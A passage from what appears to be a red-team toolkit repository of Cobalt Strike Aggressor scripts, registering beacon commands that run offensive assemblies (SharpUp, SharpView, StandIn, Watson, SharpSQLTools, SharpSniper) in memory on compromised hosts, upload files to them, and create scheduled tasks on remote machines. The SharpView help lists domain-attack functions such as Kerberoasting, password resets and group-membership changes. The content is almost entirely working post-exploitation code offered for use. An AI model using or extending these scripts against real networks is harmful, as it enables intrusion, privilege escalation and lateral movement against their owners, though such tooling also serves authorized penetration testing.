else{ 16 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 17 | } 18 | bexecute_assembly!($bid, script_resource("exe/SharpSniper.exe"), $argu); 19 | } 20 | -------------------------------------------------------------------------------- /scripts/cmd/sharpsqltools_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpsqltools", "Privilege Escalation Checks", 2 | "Usage: sharpsqltools [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpsqltools{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "sharpsqltools"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpSQLTools.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpup_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpup", "Privilege Escalation Checks", 2 | "Usage: sharpup [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpup{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SharpUp"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpUp.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpview_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpview", "C# tool to gain network situational awareness on Windows domains.", 2 | "Usage: sharpview [arguments]\n\n" . 3 | "Available arguments:\n 4 | Add-DomainGroupMember 5 | Add-DomainObjectAcl 6 | Add-ObjectAcl 7 | Add-RemoteConnection 8 | Convert-ADName 9 | ConvertFrom-SID 10 | ConvertFrom-UACValue 11 | Convert-SidToName 12 | ConvertTo-SID 13 | Export-PowerViewCSV 14 | Find-DomainLocalGroupMember 15 | Find-DomainObjectPropertyOutlier 16 | Find-DomainProcess 17 | Find-DomainShare 18 | Find-DomainUserEvent 19 | Find-DomainUserLocation 20 | Find-ForeignGroup 21 | Find-ForeignUser 22 | Find-GPOComputerAdmin 23 | Find-GPOLocation 24 | Find-InterestingDomainAcl 25 | Find-InterestingDomainShareFile 26 | Find-InterestingFile 27 | Find-LocalAdminAccess 28 | Find-ManagedSecurityGroups 29 | Get-ADObject 30 | Get-CachedRDPConnection 31 | Get-DFSshare 32 | Get-DNSRecord 33 | Get-DNSZone 34 | Get-Domain 35 | Get-DomainComputer 36 | Get-DomainController 37 | Get-DomainDFSShare 38 | Get-DomainDNSRecord 39 | Get-DomainDNSZone 40 | Get-DomainFileServer 41 | Get-DomainForeignGroupMember 42 | Get-DomainForeignUser 43 | Get-DomainGPO 44 | Get-DomainGPOComputerLocalGroupMapping 45 | Get-DomainGPOLocalGroup 46 | Get-DomainGPOUserLocalGroupMapping 47 | Get-DomainGroup 48 | Get-DomainGroupMember 49 | Get-DomainGUIDMap 50 | Get-DomainManagedSecurityGroup 51 | Get-DomainObject 52 | Get-DomainObjectAcl 53 | Get-DomainOU 54 | Get-DomainPolicy 55 | Get-DomainPolicyData 56 | Get-DomainSID 57 | Get-DomainSite 58 | Get-DomainSPNTicket 59 | Get-DomainSubnet 60 | Get-DomainTrust 61 | Get-DomainTrustMapping 62 | Get-DomainUser 63 | Get-DomainUserEvent 64 | Get-Forest 65 | Get-ForestDomain 66 | Get-ForestGlobalCatalog 67 | Get-ForestTrust 68 | Get-GptTmpl 69 | Get-GroupsXML 70 | Get-GUIDMap 71 | Get-IniContent 72 | Get-IPAddress 73 | Get-LastLoggedOn 74 | Get-LoggedOnLocal 75 | Get-NetComputer 76 | Get-NetComputerSiteName 77 | Get-NetDomain 78 | Get-NetDomainController 79 | Get-NetDomainTrust 80 | Get-NetFileServer 81 | Get-NetForest 82 | Get-NetForestCatalog 83 | Get-NetForestDomain 84 | Get-NetForestTrust 85 | Get-NetGPO 86 | Get-NetGPOGroup 87 | Get-NetGroup 88 | Get-NetGroupMember 89 | Get-NetLocalGroup 90 | Get-NetLocalGroupMember 91 | Get-NetLoggedon 92 | Get-NetOU 93 | Get-NetProcess 94 | Get-NetRDPSession 95 | Get-NetSession 96 | Get-NetShare 97 | Get-NetSite 98 | Get-NetSubnet 99 | Get-NetUser 100 | Get-ObjectAcl 101 | Get-PathAcl 102 | Get-PrincipalContext 103 | Get-Proxy 104 | Get-RegistryMountedDrive 105 | Get-RegLoggedOn 106 | Get-SiteName 107 | Get-UserEvent 108 | Get-WMIProcess 109 | Get-WMIRegCachedRDPConnection 110 | Get-WMIRegLastLoggedOn 111 | Get-WMIRegMountedDrive 112 | Get-WMIRegProxy 113 | Invoke-ACLScanner 114 | Invoke-CheckLocalAdminAccess 115 | Invoke-Kerberoast 116 | Invoke-MapDomainTrust 117 | Invoke-RevertToSelf 118 | Invoke-UserImpersonation 119 | New-DomainGroup 120 | New-DomainUser 121 | Remove-DomainObjectAcl 122 | Remove-RemoteConnection 123 | Request-SPNTicket 124 | Resolve-IPAddress 125 | Set-ADObject 126 | Set-DomainObject 127 | Set-DomainUserPassword 128 | Test-AdminAccess 129 | TestMethod"); 130 | alias sharpview{ 131 | local('$bid $asm $desc @args $argu'); 132 | $bid = $1; 133 | $desc = "SharpView"; 134 | @args = @_; 135 | remove(@args, $bid); 136 | $argu = join(' ', @args); 137 | if ($argu eq ""){ 138 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 139 | } 140 | else{ 141 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 142 | } 143 | bexecute_assembly!($bid, script_resource("exe/SharpView.exe"), $argu); 144 | } 145 | -------------------------------------------------------------------------------- /scripts/cmd/standin_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("standin", "域内信息收集工具", 2 | "Usage: standin [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | 5 | alias standin{ 6 | local('$bid $asm $desc @args $argu'); 7 | $bid = $1; 8 | $desc = "standin"; 9 | @args = @_; 10 | remove(@args, $bid); 11 | $argu = join(' ', @args); 12 | if ($argu eq ""){ 13 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 14 | } 15 | else{ 16 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 17 | } 18 | bexecute_assembly!($bid, script_resource("exe/StandIn.exe"), $argu); 19 | } 20 | -------------------------------------------------------------------------------- /scripts/cmd/test.cna: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/scripts/cmd/test.cna -------------------------------------------------------------------------------- /scripts/cmd/upload.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register( 2 | "upload", 3 | "Upload a file to specified remote location.", 4 | "Use: upload [/remote/path/to/file]\n\nUpload a file from local path (first argument) to remote path (second argument, optional)."); 5 | 6 | sub interpretSize { 7 | local('$s $size'); 8 | $s = $1; 9 | 10 | if($s == 0) { 11 | $size = ""; 12 | } 13 | else if($s < 1024) { 14 | $size .= $s . "B"; 15 | } 16 | else if($s < 1024 * 1024) { 17 | $size = round($s / 1024.0, 1); 18 | $size .= "KB"; 19 | } 20 | else if($s < 1024 * 1024 * 1024) { 21 | $size = round(($s / 1024.0) / 1024, 1); 22 | $size .= "MB"; 23 | } 24 | else if($s < 1024 * 1024 * 1024 * 1024) { 25 | $size = round((($s / 1024.0) / 1024) / 1024, 1); 26 | $size .= "GB"; 27 | } 28 | 29 | return $size; 30 | } 31 | 32 | alias upload { 33 | local('$bid $f $localpath $remotepath $content'); 34 | ($bid, $localpath, $remotepath) = @_; 35 | 36 | if($localpath is $null || strlen($localpath) == 0) { 37 | prompt_file_open("Choose a file", $null, false, lambda({ 38 | bupload($bid, $1); 39 | }, $bid => $bid)); 40 | return; 41 | } 42 | 43 | if($localpath is $null || strlen($localpath) == 0) { 44 | berror($1, "Source file path (local path) must be specified."); 45 | return; 46 | } 47 | 48 | if(!-exists $localpath) { 49 | berror($1, "Specified input file does not exist: ( $+ $localpath $+ )"); 50 | return; 51 | } 52 | 53 | if($remotepath is $null || strlen($remotepath) == 0) { 54 | bupload($bid, $localpath); 55 | return; 56 | } 57 | 58 | try { 59 | $f = openf($localpath); 60 | $content = readb($f, -1); 61 | if($content is $null) { 62 | throw "Read empty file"; 63 | } 64 | closef($f); 65 | } 66 | catch $message { 67 | berror($1, "Could not read contents of file to upload. Error: $message"); 68 | return; 69 | } 70 | 71 | btask($1, "Tasked Beacon to upload file (size: " . interpretSize(strlen($content)) . ") from: ( $+ $localpath $+ ) to: ( $+ $remotepath $+ )"); 72 | 73 | bupload_raw!($1, $remotepath, $content, $localpath); 74 | } 75 | -------------------------------------------------------------------------------- /scripts/cmd/watson_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("watson", "找出补丁和一些CVE", 2 | "Usage: watson\n\n" . 3 | "Uses execute-assembly to run the assembly\n"); 4 | alias watson{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "Watson"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/Watson.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/demo.cna: -------------------------------------------------------------------------------- 1 | # 提示框demo 2 | sub sharptask{ 3 | # beacon ID 4 | $bid = $1; 5 | # command arugement variable 6 | $cmdargs = ""; 7 | # Pop Dialog Box and control flow 8 | $dialog = dialog("提示框头部", %(execmethod => "Execute-Assembly"), lambda({ 9 | 10 | # manipulate the first argument depending on the executables command line switch statements 11 | # manipulate the second argument depending on the expected input format 12 | foreach $key => $value ($3){ 13 | if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){ 14 | $cmdargs .= $key; 15 | $cmdargs .= ' '; 16 | $cmdargs .= $value.' '; 17 | $cmdargs .= ' '; 18 | } 19 | 20 | } 21 | # btask just displays message in beacon window 22 | # execute assembly it is important to notate the use of periods for concatenating the ptt switch 23 | if ($3["execmethod"] eq "Execute-Assembly"){ 24 | btask($bid, 'Executing Pass The Ticket via Execute-Assembly'); 25 | bexecute_assembly($bid, script_resource('/exe/SharpTask.exe'), '--AddTask'.$cmdargs.''.""); 26 | } 27 | 28 | })); 29 | 30 | # Dialog box contents and text boxes mapped to command line argument keys 31 | dialog_description($dialog, "Enter The Following Information To Create A Scheduled Task On A Remote Machine:"); 32 | drow_text($dialog, "", "Computer"); 33 | drow_text($dialog, "", "Time"); 34 | drow_text($dialog, "", "Folder"); 35 | drow_text($dialog, "", "Task Name"); 36 | drow_text($dialog, "", "Task Description"); 37 | drow_text($dialog, "", "Path To Executable"); 38 | dbutton_action($dialog, "Run"); 39 | dialog_show($dialog); 40 | } --------------------------------------------------------------------------------